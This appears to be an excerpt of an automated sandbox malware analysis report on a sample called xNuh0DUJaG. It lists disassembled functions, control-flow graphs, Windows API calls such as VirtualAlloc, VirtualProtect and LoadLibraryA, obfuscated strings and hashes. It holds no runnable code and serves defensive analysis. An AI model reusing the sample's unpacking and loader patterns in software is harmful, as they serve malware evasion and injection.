                                                                                                                                                                                                                                        • String ID: M$96$:;$%$F*R($[&h$$e?^$k"@ $n:T8$#~|$#~|
                                                                                                                                                                                                                                        • API String ID: 1810270423-2807872674
                                                                                                                                                                                                                                        • Opcode ID: b9f6e505c8dc3f742046bcb89f644a5fe799d125bb799c1c1616f98f374443e3
                                                                                                                                                                                                                                        • Instruction ID: 0fa8c84a7900d0f22f2d4f21e88135ff08406c7ea1f94cba9a5970d36c475c8e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b9f6e505c8dc3f742046bcb89f644a5fe799d125bb799c1c1616f98f374443e3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 735202726083408BD714CF68C88176BFBE1EF89314F189A2EE5D597391D778D806CB96
                                                                                                                                                                                                                                        Function 00415720 Relevance: 17.5, APIs: 1, Strings: 8, Instructions: 1798COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 9?4<$BYQZ$DASS$F2}0$L$NR@:$R(RW$a
                                                                                                                                                                                                                                        • API String ID: 0-3642574725
                                                                                                                                                                                                                                        • Opcode ID: 6148dea6bb01918abac136e4becee31112817ab7b65bcb59c5fa8d9ad293f859
                                                                                                                                                                                                                                        • Instruction ID: 7f7427958d78b94ffc8c4a18595fe2cbb503adca6349e1c34573b0944bc9dd97
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6148dea6bb01918abac136e4becee31112817ab7b65bcb59c5fa8d9ad293f859
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 80C21675608350DFD7209F28D8957ABB7E2EFC6314F19892DE4C98B391EB389841CB46
                                                                                                                                                                                                                                        Function 00408880 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 180threadCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 580 408880-408891 call 43fba0 583 408ab5-408ab7 ExitProcess 580->583 584 408897-40889e call 4385b0 580->584 587 408ab0 call 440240 584->587 588 4088a4-4088c8 GetCurrentProcessId GetCurrentThreadId 584->588 587->583 590 4088ca-4088cc 588->590 591 4088ce-408972 SHGetSpecialFolderPathW GetForegroundWindow 588->591 590->591 592 408974-408997 591->592 593 408999-4089a8 591->593 592->593 594 4089b0-4089c4 593->594 594->594 595 4089c6-4089f2 call 43eb20 594->595 598 408a00-408a3b 595->598 599 408a74-408a92 call 409ce0 598->599 600 408a3d-408a72 598->600 603 408a94 call 40cdd0 599->603 604 408a9e-408aa5 599->604 600->598 607 408a99 call 40ba80 603->607 604->587 606 408aa7-408aad call 408170 604->606 606->587 607->604
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 004088A4
                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 004088AE
                                                                                                                                                                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408955
                                                                                                                                                                                                                                        • GetForegroundWindow.USER32 ref: 0040896A
                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00408AB7
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                                        • String ID: 6W01
                                                                                                                                                                                                                                        • API String ID: 4063528623-326071965
                                                                                                                                                                                                                                        • Opcode ID: 39779329cba8329f932d9f79242290fe4725b3bdf2e9b5d89c9d7ceec3140c35
                                                                                                                                                                                                                                        • Instruction ID: 68999dc676c32329d0dd7cdb3a03855c51f4a57e0b82bf1efaa177e53c028fce
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 39779329cba8329f932d9f79242290fe4725b3bdf2e9b5d89c9d7ceec3140c35
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A0516A73B443040BD328EF659C46356BA879BC5314F0AC13EA985BB7E2ED78980586CA
                                                                                                                                                                                                                                        Function 0040B2B0 Relevance: 9.3, Strings: 7, Instructions: 518COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 611 40b2b0-40b338 612 40b340-40b349 611->612 612->612 613 40b34b-40b35e 612->613 615 40b700-40b74a 613->615 616 40b661-40b6ab call 408040 613->616 617 40b6b4-40b6ff 613->617 618 40b365-40b367 613->618 619 40b658-40b65c 613->619 620 40b36c-40b5a5 613->620 631 40b750-40b757 615->631 616->617 617->615 623 40ba61-40ba67 618->623 621 40ba52-40ba5e 619->621 624 40b5b0-40b635 620->624 621->623 629 40ba70 623->629 624->624 625 40b63b-40b646 624->625 630 40b64a-40b651 625->630 630->615 630->616 630->617 630->619 630->631 632 40ba00 630->632 633 40b804-40b80b 630->633 634 40b904-40b908 630->634 635 40b7c5 630->635 636 40ba06-40ba0a 630->636 638 40b7cb-40b7d1 630->638 639 40b80d-40b81f 630->639 640 40b90d-40b92d 630->640 641 40b94d-40b954 630->641 642 40b990-40b994 630->642 643 40ba11-40ba16 630->643 644 40b9d8-40b9f4 630->644 645 40b95b-40b970 call 441c40 630->645 646 40b8dc-40b8e6 630->646 647 40ba1d 630->647 648 40b75e-40b76c 630->648 649 40b7e0-40b7e6 630->649 651 40ba23-40ba30 630->651 652 40b9a3-40b9b5 630->652 653 40b8ed-40b902 call 441c40 630->653 654 40b7ef-40b7fd 630->654 655 40b972-40b976 630->655 658 40b934-40b946 630->658 659 40ba35-40ba38 630->659 661 40b97b-40b984 630->661 662 40b9bc-40b9d1 call 440260 630->662 663 40b9fd-40b9ff 630->663 631->629 631->632 631->633 631->634 631->635 631->636 637 40ba49 631->637 631->638 631->639 631->640 631->641 631->642 631->643 631->644 631->645 631->646 631->647 631->648 631->649 650 40b7a0-40b7bd call 441c40 631->650 631->651 631->652 631->653 631->654 631->655 656 40ba72-40ba79 631->656 657 40b773 631->657 631->658 631->659 660 40b779-40b794 call 441c40 631->660 631->661 631->662 631->663 664 40b83c-40b867 633->664 667 40ba3f-40ba42 634->667 635->638 636->629 636->634 636->637 636->643 636->645 636->647 636->650 636->653 636->655 636->656 636->657 636->659 636->660 637->621 638->649 665 40b820-40b834 639->665 640->629 640->632 640->634 640->636 640->637 640->641 640->642 640->643 640->644 640->645 640->647 640->650 640->651 640->652 640->653 640->655 640->656 640->657 640->658 640->659 640->660 640->661 640->662 640->663 641->629 641->634 641->637 641->645 641->650 641->653 641->655 641->656 641->657 641->660 672 40b99d 642->672 643->629 643->634 643->637 643->645 643->647 643->650 643->653 643->655 643->656 643->657 643->659 643->660 644->663 645->655 646->629 646->634 646->637 646->650 646->653 646->656 646->657 646->660 648->629 648->637 648->650 648->656 648->657 648->660 649->654 650->635 651->642 652->629 652->632 652->634 652->636 652->637 652->643 652->644 652->645 652->647 652->650 652->653 652->655 652->656 652->657 652->659 652->660 652->662 652->663 653->634 654->629 654->632 654->633 654->634 654->636 654->637 654->639 654->640 654->641 654->642 654->643 654->644 654->645 654->646 654->647 654->650 654->651 654->652 654->653 654->655 654->656 654->657 654->658 654->659 654->660 654->661 654->662 654->663 655->659 658->629 658->632 658->634 658->636 658->637 658->641 658->642 658->643 658->644 658->645 658->647 658->650 658->651 658->652 658->653 658->655 658->656 658->657 658->659 658->660 658->661 658->662 658->663 659->667 660->650 661->642 662->629 662->632 662->634 662->636 662->637 662->643 662->644 662->645 662->647 662->650 662->653 662->655 662->656 662->657 662->659 662->660 662->663 663->632 674 40b870-40b8b6 664->674 665->665 673 40b836-40b839 665->673 667->637 672->652 673->664 674->674 684 40b8b8-40b8d5 674->684 684->629 684->632 684->634 684->636 684->637 684->640 684->641 684->642 684->643 684->644 684->645 684->646 684->647 684->650 684->651 684->652 684->653 684->655 684->656 684->657 684->658 684->659 684->660 684->661 684->662 684->663
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 6C(]$?_oY$@w@q$Bc*}$K{Du$`/()$fWpQ
                                                                                                                                                                                                                                        • API String ID: 0-74227037
                                                                                                                                                                                                                                        • Opcode ID: 38d3abca32f2cf0db45db9bcd24ebb0db54af3e6334d844c9839fcbf09972b5b
                                                                                                                                                                                                                                        • Instruction ID: 6cbb9b4a16d706e95eb7c5eb543f19fb0438a443f67131002351f3f2f8f3bf58
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 38d3abca32f2cf0db45db9bcd24ebb0db54af3e6334d844c9839fcbf09972b5b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FA1299B5205B01CFD324CF25D891B97BBF6FB45314F058A2DD5AA8BAA0DB74A406CF84
                                                                                                                                                                                                                                        Function 00421E70 Relevance: 4.2, Strings: 3, Instructions: 435COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 694 421e70-421e82 695 421e88-421edb 694->695 696 42214f-422151 694->696 698 421ee0-421f2d 695->698 697 422370-42237c 696->697 698->698 699 421f2f-421f62 call 43fb40 698->699 702 421f70-421fb4 699->702 702->702 703 421fb6-421fff 702->703 704 422000-42202c 703->704 704->704 705 42202e-422078 704->705 706 422080-4220a6 705->706 706->706 707 4220a8-4220e9 call 441c40 706->707 710 4220ec-4220ee 707->710 710->696 711 4220f0-422104 710->711 713 422156-422158 711->713 714 422106-42210b 711->714 715 422367-42236c 713->715 716 422110-422119 714->716 715->697 716->716 717 42211b-42212a 716->717 718 422130-422139 717->718 718->718 719 42213b-422146 718->719 720 422148-42214d 719->720 721 42215d 719->721 722 42215f-422170 call 408160 720->722 721->722 725 422192-4221a6 722->725 726 422172-422177 722->726 728 4221b0-4221ce 725->728 727 422180-422190 726->727 727->725 727->727 728->728 729 4221d0-4221e9 728->729 730 422204 729->730 731 4221eb-4221ee 729->731 732 422206-42221b 730->732 733 4221f0-422200 731->733 736 42227f-422281 732->736 737 42221d-42222c 732->737 733->733 734 422202 733->734 734->732 738 422354-422364 call 408170 736->738 737->736 741 42222e-42224d 737->741 738->715 741->736 745 42224f-42225f 741->745 746 422260-422269 745->746 746->746 747 42226b-422276 746->747 748 422286 747->748 749 422278-42227d 747->749 750 422288-422299 call 408160 748->750 749->750 753 4222b1-4222c2 750->753 754 42229b-42229e 750->754 756 4222d0-4222ee 753->756 755 4222a0-4222af 754->755 755->753 755->755 756->756 757 4222f0-422309 756->757 758 422322-422351 call 4215c0 call 408170 757->758 759 42230b-42230f 757->759 758->738 760 422310-422320 759->760 760->758 760->760
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: (ijkdefgau`c$au`c$defgau`c
                                                                                                                                                                                                                                        • API String ID: 0-3415814675
                                                                                                                                                                                                                                        • Opcode ID: c3efea4fa2bab3c823527f8003c6373997cd92d148a9c0371e5379c7b59358e5
                                                                                                                                                                                                                                        • Instruction ID: e077c08026441789f2384525beb931856e433a8fb10ce9bf48ff95afe867dbef
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c3efea4fa2bab3c823527f8003c6373997cd92d148a9c0371e5379c7b59358e5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E8D10FB16083509FC714DF28C891B6BBBE1EFC5318F18892DE9858B391E7B9D805CB56
                                                                                                                                                                                                                                        Function 004807A6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 766 4807a6-4807bf 767 4807c1-4807c3 766->767 768 4807ca-4807d6 CreateToolhelp32Snapshot 767->768 769 4807c5 767->769 770 4807d8-4807de 768->770 771 4807e6-4807f3 Module32First 768->771 769->768 770->771 776 4807e0-4807e4 770->776 772 4807fc-480804 771->772 773 4807f5-4807f6 call 480465 771->773 777 4807fb 773->777 776->767 776->771 777->772
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 004807CE
                                                                                                                                                                                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 004807EE
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541906304.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_480000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3833638111-0
                                                                                                                                                                                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                        • Instruction ID: 9cce8c294103611244094b52ead4ac2b276583330fce761038f187e27ce8a4a1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1CF0F6315103106FE7603BF5988CB6FB6E8AF49B25F10092AE643911C0DB78FC094F64
                                                                                                                                                                                                                                        Function 0040AA32 Relevance: 2.6, Strings: 2, Instructions: 64COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 829 40aa32-40aa35 830 40aa82 829->830 831 40aa37-40aa5f 829->831 832 40aa60-40aa72 831->832 832->832 833 40aa74-40aa7b 832->833 836 40aa00-40aa12 833->836 836->836 837 40aa14-40aa2e 836->837
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: MO$MO
                                                                                                                                                                                                                                        • API String ID: 0-3148518880
                                                                                                                                                                                                                                        • Opcode ID: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
                                                                                                                                                                                                                                        • Instruction ID: de3bae81b745c0a1c58d0910fc7dee7dc7ce1027ddf7ad09ed428793afe2e5a8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BB119E742443818BEF148F649D916677FA0EF42320B2499A99C455F3CBC638C511CF69
                                                                                                                                                                                                                                        Function 004402C0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • LdrInitializeThunk.NTDLL(0044316E,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 004402EE
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                        • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                        • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                        Function 0040CFEC Relevance: 1.5, Strings: 1, Instructions: 234COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • 43A2C7AD89C30672D0632DF0E28DC412, xrefs: 0040D16B
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 43A2C7AD89C30672D0632DF0E28DC412
                                                                                                                                                                                                                                        • API String ID: 0-3398323051
                                                                                                                                                                                                                                        • Opcode ID: c0272db486a5433980f84697cda1718a3c11d4939a8aa7d752475a23ba758509
                                                                                                                                                                                                                                        • Instruction ID: 6f13f5d4f3e8c77ab841d9a888d2aead65439f765ee3ddc41d93c1b162d9100a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c0272db486a5433980f84697cda1718a3c11d4939a8aa7d752475a23ba758509
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5B516A726057008FD329CF38CC92B577BA3AFD6314B1D866DC4964B796EB39A406C744
                                                                                                                                                                                                                                        Function 0040C334 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: bc8b52f0ebde1275c747968acf05f407d654f666dd441839f953e78bda0e1710
                                                                                                                                                                                                                                        • Instruction ID: 19ad3dfdcd8e9eec61f1e1188f3eb7c49d356ea6c47e6a039e33f49038878d3c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bc8b52f0ebde1275c747968acf05f407d654f666dd441839f953e78bda0e1710
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0D11087465C3808BD318CF18D9C075BBBE29BD6314F244A2CD5C117295C7B5990ACB6A
                                                                                                                                                                                                                                        Function 0210003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 492 210003c-2100047 493 2100049 492->493 494 210004c-2100263 call 2100a3f call 2100e0f call 2100d90 VirtualAlloc 492->494 493->494 509 2100265-2100289 call 2100a69 494->509 510 210028b-2100292 494->510 515 21002ce-21003c2 VirtualProtect call 2100cce call 2100ce7 509->515 512 21002a1-21002b0 510->512 514 21002b2-21002cc 512->514 512->515 514->512 521 21003d1-21003e0 515->521 522 21003e2-2100437 call 2100ce7 521->522 523 2100439-21004b8 VirtualFree 521->523 522->521 525 21005f4-21005fe 523->525 526 21004be-21004cd 523->526 529 2100604-210060d 525->529 530 210077f-2100789 525->530 528 21004d3-21004dd 526->528 528->525 534 21004e3-2100505 LoadLibraryA 528->534 529->530 535 2100613-2100637 529->535 532 21007a6-21007b0 530->532 533 210078b-21007a3 530->533 537 21007b6-21007cb 532->537 538 210086e-21008be LoadLibraryA 532->538 533->532 539 2100517-2100520 534->539 540 2100507-2100515 534->540 536 210063e-2100648 535->536 536->530 542 210064e-210065a 536->542 543 21007d2-21007d5 537->543 548 21008c7-21008f9 538->548 541 2100526-2100547 539->541 540->541 546 210054d-2100550 541->546 542->530 547 2100660-210066a 542->547 544 2100824-2100833 543->544 545 21007d7-21007e0 543->545 554 2100839-210083c 544->554 549 21007e2 545->549 550 21007e4-2100822 545->550 551 21005e0-21005ef 546->551 552 2100556-210056b 546->552 553 210067a-2100689 547->553 555 2100902-210091d 548->555 556 21008fb-2100901 548->556 549->544 550->543 551->528 557 210056d 552->557 558 210056f-210057a 552->558 559 2100750-210077a 553->559 560 210068f-21006b2 553->560 554->538 561 210083e-2100847 554->561 556->555 557->551 562 210059b-21005bb 558->562 563 210057c-2100599 558->563 559->536 564 21006b4-21006ed 560->564 565 21006ef-21006fc 560->565 566 2100849 561->566 567 210084b-210086c 561->567 575 21005bd-21005db 562->575 563->575 564->565 569 210074b 565->569 570 21006fe-2100748 565->570 566->538 567->554 569->553 570->569 575->546
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0210024D
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                                        • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                        • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                        • Instruction ID: aad6ab16f8a28cd0eb1489dbc57eebdc88624be26de041bf3cadf3bec6a1f088
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F4525974A01229DFDB64CF58C984BACBBB1BF09304F1580E9E54DAB391DB70AA95CF14
                                                                                                                                                                                                                                        Function 0040E3D3 Relevance: 3.1, APIs: 2, Instructions: 120COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 765 40e3d3-40e540 CoInitializeEx * 2
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CoInitializeEx.OLE32(00000000,00000002), ref: 0040E3D7
                                                                                                                                                                                                                                        • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040E51A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Initialize
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2538663250-0
                                                                                                                                                                                                                                        • Opcode ID: c988e08bd81bdbbbc832e77591d1fe524e628b2a2385e733f966e0820bef1a3a
                                                                                                                                                                                                                                        • Instruction ID: b2aa6f84acc7d50c337c606844e5536a7248dcea6e3e3aabb346ed1b6ad7aec1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c988e08bd81bdbbbc832e77591d1fe524e628b2a2385e733f966e0820bef1a3a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CC41FAB4C10B40AFD370EF3D9A0B7167EB4AB05214F404B2DF9E6966D4E230A4198BD7
                                                                                                                                                                                                                                        Function 02100E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 779 2100e0f-2100e24 SetErrorMode * 2 780 2100e26 779->780 781 2100e2b-2100e2c 779->781 780->781
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • SetErrorMode.KERNELBASE(00000400,?,?,02100223,?,?), ref: 02100E19
                                                                                                                                                                                                                                        • SetErrorMode.KERNELBASE(00000000,?,?,02100223,?,?), ref: 02100E1E
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorMode
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                                                                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                        • Instruction ID: d5591706dddec6dc70c020a45b27ca906bb1356f428d6b1f08c8c78c4e708908
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
